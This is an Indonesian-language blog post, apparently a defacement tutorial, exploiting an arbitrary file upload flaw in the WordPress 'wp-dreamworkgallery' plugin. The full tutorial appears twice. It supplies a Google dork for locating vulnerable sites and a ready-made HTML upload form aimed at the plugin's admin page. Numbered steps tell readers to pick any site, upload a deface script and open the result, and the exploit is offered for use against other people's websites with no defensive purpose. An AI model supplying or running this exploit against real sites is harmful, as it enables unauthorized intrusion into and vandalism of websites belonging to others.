Deface Poc : WP ARBITRARY DREAM WORK GALLERY FILE UPLOAD
Bahan-bahan yang harus disiapin
1.Dork : inurl:/wp-content/plugins/wp-dreamworkgallery
2.Script Deface
3.script :
<form action="www.target.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>
4.klo Pc : Notepad,dll, klo andro : (app yang biasa lu gunain buat script) terserah, klo gw pake "Es Pengelola Berkas"
Langkag - Langkah :
1.Biasalah gan Dorking Dulu
2.pilih web bebas (untuk vulnerablenya gw blm tau kaya gmn)
3.buka aplikasi yg biasa lu pake (notepad, es pengelola berkas, dll)
4.copas script diatas
5.ubah "www.target.com" jadi web yang mau kalian tusbol
6.simpen Scriptnya dengan ekstensi ".html" (tanpa tanda kutip)
7.buka script nya
8.nanti bakalan ada tulisan "choose file" , masukin script deface lu, lalu klik "sumbit"
9.setelah di upload maka akan otomatis menuju ke web target lu, dan akan muncul gambar kaya diatas
10.copas tulisan yang gw kasi tanda merah diatas ke sebelah target kalian
11.dan Booom!! nanti bakalan muncul Sc deface lu!!
./0xpl01t3r
Bahan-bahan yang harus disiapin
1.Dork : inurl:/wp-content/plugins/wp-dreamworkgallery
2.Script Deface
3.script :
<form action="www.target.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>
4.klo Pc : Notepad,dll, klo andro : (app yang biasa lu gunain buat script) terserah, klo gw pake "Es Pengelola Berkas"
Langkag - Langkah :
1.Biasalah gan Dorking Dulu
2.pilih web bebas (untuk vulnerablenya gw blm tau kaya gmn)
3.buka aplikasi yg biasa lu pake (notepad, es pengelola berkas, dll)
4.copas script diatas
5.ubah "www.target.com" jadi web yang mau kalian tusbol
6.simpen Scriptnya dengan ekstensi ".html" (tanpa tanda kutip)
7.buka script nya
8.nanti bakalan ada tulisan "choose file" , masukin script deface lu, lalu klik "sumbit"
9.setelah di upload maka akan otomatis menuju ke web target lu, dan akan muncul gambar kaya diatas
10.copas tulisan yang gw kasi tanda merah diatas ke sebelah target kalian
11.dan Booom!! nanti bakalan muncul Sc deface lu!!
./0xpl01t3r
0 Komentar